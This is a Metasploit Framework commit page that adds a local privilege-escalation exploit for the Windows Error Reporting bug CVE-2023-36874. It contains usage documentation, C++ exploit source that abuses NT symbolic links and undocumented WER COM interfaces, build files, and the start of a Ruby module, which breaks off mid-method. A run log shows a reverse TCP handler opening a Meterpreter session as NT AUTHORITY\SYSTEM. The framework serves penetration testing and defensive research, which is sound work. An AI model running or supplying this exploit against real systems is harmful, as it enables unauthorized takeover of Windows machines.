github
/
metasploit-framework
mirror of https://github.com/rapid7/metasploit-framework
1
Fork 0
Code Releases Activity

Land #18314, Windows Error Reporting RCE (CVE-2023-36874)

This commit is contained in:
Christophe De La Fuente 2023-09-27 15:25:06 +02:00
parent aa2a8433fe 2c9932b242
commit 1058291af9
No known key found for this signature in database
GPG Key ID: 9E350956EA00352A
10 changed files with 725 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
LICENSE
View File

@ -85,6 +85,13 @@ Files: exteneral/source/exploits/CVE-2022-26904/*
Copyright: 2022 Abdelhamid Naceri
License: MIT
Files: external/source/exploits/CVE-2023-36874/*
Copyright: 2023 Octoberfest7
License: MIT
Purpose: Library and error report file are required for calculating offsets to the correct
function calls to implement the exploit. The heavily modified C main is necessary
to create and trigger the exploit.
Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
Copyright: 2011 Jon Bringhurst
License: GNU GPL 2.0

BIN
data/exploits/CVE-2023-36874/CVE-2023-36874.exe Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2023-36874/Report.wer Normal file
View File

Binary file not shown.

113
documentation/modules/exploit/windows/local/win_error_cve_2023_36874.md Normal file
View File

@ -0,0 +1,113 @@
## Vulnerable Application
This module works only on Windows 10x64 22H2
### Introduction
This module takes advantage of a bug in the way Windows error reporting opens the report
parser. If you open a report, Windows uses a relative path to locate the rendering program.
By creating a specific alternate directory structure, we can coerce Windows into opening an
arbitrary executable as SYSTEM.
If the current user is a local admin, the system will attempt impersonation and the exploit will
fail. Because the payload is added to a directory this module creates, in the event of successful
exploitation, the user will need to delete the payload and the directories containing the payload
manually.
This module will attempt to delete the payload it uploads and the directory structure.
## Installation Instructions
1. Install Windows 10x64 22H2
1. Create a standard user
## Verification Steps
1. Create a session on the target system under the context of a non local administrative user.
1. Begin interacting with the module: `use exploit/windows/local/win_error_cve_2023_36874`.
1. Set the `PAYLOAD` and configure it correctly.
1. If an existing handler is configured to receive the elevated session, then the module's
handler should be disabled: `set DisablePayloadHandler true`.
1. Make sure that the `SESSION` value is set to the existing session identifier.
1. Invoke the module: `run`.
## Options
### EXPLOIT_NAME
The filename to use for the exploit binary (%RAND%.exe by default)
### REPORT_DIR
The Error Directory to use (%RAND% by default).
### REPORT_NAME
The Error report name (%RAND% by default).
### SHADOW_DRIVE
Directory to place in the home drive for pivot (%TEMP% by default).
### EXECUTE_DELAY
The number of seconds to delay between file upload and exploit launch. Default is 3.
## Scenarios
### Windows 10.0.19045.2006 x64 (Windows 10x64 22H2)
```
msf6 exploit(windows/local/win_error_cve_2023_36874) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS version: Windows 10+ Build 19045
[+] The target appears to be vulnerable.
[*] Shadow Path = C:\NpIWBsCJozK
[*] Attempting to PrivEsc on DESKTOP-V413087 via session ID: 1
[*] C:\ProgramData
[*] Creating C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] Creating directory C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
[*] Writing Report to C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
[*] Creating directory C:\NpIWBsCJozK
[*] C:\NpIWBsCJozK created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\
[*] C:\NpIWBsCJozK\ProgramData\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
[*] Writing bad Report to C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
[*] Creating C:\NpIWBsCJozK\system32
[*] Creating directory C:\NpIWBsCJozK\system32
[*] C:\NpIWBsCJozK\system32 created
[*] Writing payload to C:\NpIWBsCJozK\system32\wermgr.exe
[*] shadow_path = NpIWBsCJozK
[*] Exploit uploaded on DESKTOP-V413087 to C:\NpIWBsCJozK\fShpLfYh.exe
[*] Sending stage (200774 bytes) to 10.5.132.118
[+] Deleted C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*]
[+] Deleted C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.118:62415) at 2023-09-19 15:43:02 -0500
[-] Failed to delete C:\NpIWBsCJozK\system32: stdapi_fs_delete_dir: Operation failed: The directory is not empty.
meterpreter > sysinfo
Computer : DESKTOP-V413087
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
```

31
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln vendored Executable file
View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.32929.386
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2023-36874", "CVE-2023-36874\CVE-2023-36874.vcxproj", "{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.ActiveCfg = Debug|x64
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.Build.0 = Debug|x64
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.ActiveCfg = Debug|Win32
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.Build.0 = Debug|Win32
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.ActiveCfg = Release|x64
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.Build.0 = Release|x64
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.ActiveCfg = Release|Win32
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {A022017A-2A80-4E35-A696-EB6884E52E5E}
EndGlobalSection
EndGlobal

152
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj vendored Executable file
View File

@ -0,0 +1,152 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{4cbf3aca-76e5-4c6a-9483-ca2adc6eaf6b}</ProjectGuid>
<RootNamespace>CVE202336874</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="cve_2023_36874.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="def.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

27
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj.filters vendored Executable file
View File

@ -0,0 +1,27 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="cve_2023_36874.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="def.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>

131
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/cve_2023_36874.cpp vendored Executable file
View File

@ -0,0 +1,131 @@
#include "def.h"
int wmain(int argc, wchar_t** argv)
{
IWerReport* pIWerReport = NULL;
IErcLuaSupport* pIErcLuaSupport = NULL;
IWerStoreFactory* pIWerStoreFactory = NULL;
IWerStore* pIWerStore = NULL;
IWerReportSubmitCallback* pIWerSubmitCallback = NULL;
HRESULT result = 0;
HMODULE hm = GetModuleHandle(NULL);
UNICODE_STRING symlink_name;
UNICODE_STRING path;
UNICODE_STRING object;
OBJECT_ATTRIBUTES objAttrLink, objAttrDir;
HANDLE hSymlink, hObjectdir, hSymlinkWindows, hSymlinkProgramdata;
HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
WCHAR ntdcoDir[128] = { 0 };
WCHAR ntdcoDir_1[128] = { 0 };
pNtCreateSymbolicLinkObject = (_NtCreateSymbolicLinkObject)GetProcAddress(ntdll, "NtCreateSymbolicLinkObject");
pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, "RtlInitUnicodeString");
pNtCreateDirectoryObject = (_NtCreateDirectoryObject)GetProcAddress(ntdll, "NtCreateDirectoryObject");
result = CoInitialize(NULL);
BSTR data = SysAllocString(argv[1]);
//BSTR report = SysAllocString(L"testing");
BSTR report = SysAllocString(argv[3]);
if (FAILED(result))
{
printf("Error: CoInitialize 0x%x\n", result);
return -1;
}
result = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
if (FAILED(result))
{
printf("Error: CoInitializeSecurity 0x%x\n", result);
return -1;
}
result = CoCreateInstance(__uuidof(CLSID_IErcLuaSupport), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IErcLuaSupport), (PVOID*)&pIErcLuaSupport);
if (FAILED(result))
{
printf("Error CoCreateInstance: 0x%x\n", result);
return -1;
}
result = pIErcLuaSupport->Proc3(&pIWerStoreFactory);
if (FAILED(result))
{
printf("Error pIErcLuaSupport: 0x%x\n", result);
return -1;
}
result = pIWerStoreFactory->Proc4(&pIWerStore);
if (FAILED(result))
{
printf("Error pIWerStoreFactory: 0x%x\n", result);
return -1;
}
result = pIWerStore->Proc3();
if (FAILED(result))
{
printf("Error pIWerStore(Proc3) : 0x%x\n", result);
return -1;
}
result = pIWerStore->Proc6(report, &pIWerReport);
if (FAILED(result))
{
printf("Error pIWerStore(Proc6): 0x%x\n", result);
return -1;
}
int64_t ret = 0;
ZeroMemory(ntdcoDir, 128);
swprintf_s(ntdcoDir, 128, L"\\??\\%ls", argv[1]);
pRtlInitUnicodeString(&object, ntdcoDir);
InitializeObjectAttributes(&objAttrDir, &object, OBJ_CASE_INSENSITIVE, NULL, NULL);
pNtCreateDirectoryObject(&hObjectdir, 0xF000F, &objAttrDir);
pRtlInitUnicodeString(&symlink_name, L"Windows");
ZeroMemory(ntdcoDir, 128);
swprintf_s(ntdcoDir, 128, L"\\GLOBAL??\\%ls\\%ls", argv[2], argv[1]);
pRtlInitUnicodeString(&path, ntdcoDir);
InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL);
pNtCreateSymbolicLinkObject(&hSymlinkWindows, 0xF0001, &objAttrLink, &path);
ZeroMemory(&objAttrLink, sizeof(objAttrLink));
ZeroMemory(&symlink_name, sizeof(symlink_name));
ZeroMemory(&path, sizeof(UNICODE_STRING));
pRtlInitUnicodeString(&symlink_name, L"ProgramData");
ZeroMemory(ntdcoDir, 128);
swprintf_s(ntdcoDir, 128, L"\\GLOBAL??\\%ls\\Programdata", argv[2]);
pRtlInitUnicodeString(&path, ntdcoDir);
InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL);
pNtCreateSymbolicLinkObject(&hSymlinkProgramdata, 0xF0001, &objAttrLink, &path);
ZeroMemory(&objAttrLink, sizeof(objAttrLink));
ZeroMemory(&symlink_name, sizeof(symlink_name));
ZeroMemory(&path, sizeof(UNICODE_STRING));
ZeroMemory(ntdcoDir, 128);
swprintf_s(ntdcoDir, 128, L"\\??\\%ls", argv[2]);
pRtlInitUnicodeString(&symlink_name, ntdcoDir);
ZeroMemory(ntdcoDir_1, 128);
swprintf_s(ntdcoDir_1, 128, L"\\??\\%ls", argv[1]);
pRtlInitUnicodeString(&path, ntdcoDir_1);
InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, NULL, NULL);
pNtCreateSymbolicLinkObject(&hSymlink, 0xF0001, &objAttrLink, &path);
result = pIWerReport->Proc24(report, 1024, NULL, &data, &ret);
if (FAILED(result))
{
printf("Error pIWerReport: 0x%x\n", result);
return -1;
}
Sleep(2000);
CloseHandle(hSymlink);
CloseHandle(hObjectdir);
CloseHandle(hSymlinkProgramdata);
CloseHandle(hSymlinkWindows);
}

94
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/def.h vendored Executable file
View File

@ -0,0 +1,94 @@
#include <windows.h>
#include <stdio.h>
#include <winternl.h>
#include <stdint.h>
struct __declspec(uuid("0e9a7bb5-f699-4d66-8a47-b919f5b6a1db")) CLSID_IErcLuaSupport;
class __declspec(uuid("a7a3dd4c-defc-46a2-832e-5a743be69e8c")) IWerReportSubmitCallback : public IUnknown {
public:
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t* p0);
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t p0);
virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ int64_t p1);
};
class __declspec(uuid("fe6f6e62-fe82-4f7f-947a-7f37b44594ca")) IWerKeyValueList : public IUnknown {
public:
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1, /* Stack Offset: 24 */ BSTR* p2);
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
};
class __declspec(uuid("6764c32a-97a5-44ec-9bc0-77368c7746b2")) IWerStringList : public IUnknown {
public:
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1);
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
};
class __declspec(uuid("d01b8f28-0bd1-4652-a415-8229f5ee506c")) IWerReport : public IUnknown {
public:
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t* p0);
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ BSTR* p0);
virtual HRESULT __stdcall Proc6(/* Stack Offset: 8 */ IWerKeyValueList** p0);
virtual HRESULT __stdcall Proc7(/* Stack Offset: 8 */ IWerKeyValueList** p0);
virtual HRESULT __stdcall Proc8(/* Stack Offset: 8 */ IWerStringList** p0);
virtual HRESULT __stdcall Proc9(/* Stack Offset: 8 */ int64_t* p0);
virtual HRESULT __stdcall Proc10(/* Stack Offset: 8 */ int64_t* p0);
virtual HRESULT __stdcall Proc11(/* Stack Offset: 8 */ BSTR* p0);
virtual HRESULT __stdcall Proc12(/* Stack Offset: 8 */ BSTR* p0);
virtual HRESULT __stdcall Proc13(/* Stack Offset: 8 */ IWerStringList** p0);
virtual HRESULT __stdcall Proc14(/* Stack Offset: 8 */ IWerStringList** p0);
virtual HRESULT __stdcall Proc15(/* Stack Offset: 8 */ int64_t* p0);
virtual HRESULT __stdcall Proc16(/* Stack Offset: 8 */ struct Struct_1* p0);
virtual HRESULT __stdcall Proc17(/* Stack Offset: 8 */ int64_t* p0);
virtual HRESULT __stdcall Proc18(/* Stack Offset: 8 */ int64_t* p0);
virtual HRESULT __stdcall Proc19(/* Stack Offset: 8 */ int64_t* p0);
virtual HRESULT __stdcall Proc20(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ BSTR* p1);
virtual HRESULT __stdcall Proc21(/* Stack Offset: 8 */ BSTR* p0);
virtual HRESULT __stdcall Proc22(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ int64_t* p1, /* Stack Offset: 24 */ int64_t* p2, /* Stack Offset: 32 */ BSTR* p3, /* Stack Offset: 40 */ BSTR* p4);
virtual HRESULT __stdcall Proc23(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1);
virtual HRESULT __stdcall Proc24(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ int64_t p1, /* Stack Offset: 24 */ IWerReportSubmitCallback* p2, /* Stack Offset: 32 */ /* unique */BSTR* p3, /* Stack Offset: 40 */ /* unique */int64_t* p4);
virtual HRESULT __stdcall Proc25();
};
class __declspec(uuid("1e3a0e4f-1412-444f-8a94-fc6a09cd4195")) IWerStore : public IUnknown {
public:
virtual HRESULT __stdcall Proc3();
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ BSTR* p0);
virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ BSTR p0);
virtual HRESULT __stdcall Proc6(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ IWerReport** p1);
virtual HRESULT __stdcall Proc7(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ BSTR* p1);
};
class __declspec(uuid("4904c154-426f-4c88-8ec2-4543d18670f7")) IWerStoreFactory : public IUnknown {
public:
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ IWerStore** p0);
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ IWerStore** p0);
};
class __declspec(uuid("6620c14b-70ae-4d4e-a4f6-91a7dcc582c2")) IErcLuaSupport : public IUnknown {
public:
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ IWerStoreFactory** p0);
};
typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef NTSYSAPI NTSTATUS(*_NtCreateSymbolicLinkObject)(PHANDLE pHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING DestinationName);
typedef NTSYSAPI NTSTATUS(*_NtCreateDirectoryObject)(PHANDLE DirectoryHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
_NtCreateSymbolicLinkObject pNtCreateSymbolicLinkObject;
_RtlInitUnicodeString pRtlInitUnicodeString;
_NtCreateDirectoryObject pNtCreateDirectoryObject;

170
modules/exploits/windows/local/win_error_cve_2023_36874.rb Normal file
View File

@ -0,0 +1,170 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',
'Description' => %q{
This module takes advantage of a bug in the way Windows error reporting opens the report
parser. If you open a report, Windows uses a relative path to locate the rendering program.
By creating a specific alternate directory structure, we can coerce Windows into opening an
arbitrary executable as SYSTEM.
If the current user is a local admin, the system will attempt impersonation and the exploit will
fail.
},
'License' => MSF_LICENSE,
'Author' => [
'Filip Dragović (Wh04m1001)', # PoC
'Octoberfest7', # PoC
'bwatters-r7' # msf module
],
'Platform' => ['win'],
'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
'Targets' => [
[ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-07-11',
'References' => [
['CVE', '2023-36874'],
['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],
['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],
['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_fs_delete_file
stdapi_sys_config_getenv
]
}
}
)
)
register_options([
OptString.new('EXPLOIT_NAME',
[true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
OptString.new('REPORT_DIR',
[true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
OptString.new('SHADOW_DRIVE',
[true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
OptInt.new('EXECUTE_DELAY',
[true, 'The number of seconds to delay between file upload and exploit launch', 3])
])
end
def upload_error_report
wer_archive_dir = get_env('PROGRAMDATA')
vprint_status(wer_archive_dir)
wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'
report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"
report_filename = "#{report_dir}\\Report.wer"
vprint_status("Creating #{report_dir}")
mkdir(report_dir)
wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
vprint_status("Writing Report to #{report_filename}")
write_file(report_filename, wer_report_data)
end
def build_shadow_archive_dir(shadow_base_dir)
wer_archive_dir = shadow_base_dir
mkdir(wer_archive_dir)
wer_archive_dir << '\\ProgramData\\'
mkdir(wer_archive_dir)
wer_archive_dir << 'Microsoft\\'
mkdir(wer_archive_dir)
wer_archive_dir << 'Windows\\'
